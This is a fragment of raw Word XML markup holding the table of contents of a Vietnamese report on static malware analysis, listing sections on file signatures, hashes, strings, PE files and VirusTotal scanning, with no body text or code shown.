                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2965CAE9" w14:textId="6654A4E5"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16" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vai trò của phân tích tĩnh</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718116 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4126170C" w14:textId="7164B7E9"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17" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Một số công cụ phân tích tĩnh phổ biến</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718117 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D4F0F5B" w14:textId="4A7368F5" w:rsidR="00947F5D" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="vi-VN"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc150718118" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>II.Xây dựng môi trường</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718118 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D0D1AC3" w14:textId="5C9717EF"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19" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lựa chọn mẫu mã độc</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> và công cụ</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> sử dụng để phân tích</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718119 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AC85254" w14:textId="2939C3A7" w:rsidR="00947F5D" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="vi-VN"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc150718120" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>III.Quá trình phân tích tĩnh</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718120 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="020B2FCB" w14:textId="737A0260"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21" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Xác định loại của tệp</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718121 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="023538F8" w14:textId="5A01D0B4"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22" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Xác định chữ ký tệp (File Signature)</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718122 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ED73ABE" w14:textId="3F925FDE"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23" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Phân tích mã hash</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718123 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31F561C9" w14:textId="079FF157"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24" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Phân tích strings</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718124 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DB53B41" w14:textId="23AD9450"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25" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.Tệp tin PE</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718125 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CAF0149" w14:textId="5F662DF5" w:rsidR="00947F5D" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="vi-VN"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc150718126" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>IV.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Phân tích mã động tự động sử dụng Virus Total</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718126 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00D10ABD" w14:textId="1A3C641B"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27" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Định nghĩa</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718127 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E95B77E" w14:textId="24A96FB8"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28" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Các thành phần</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
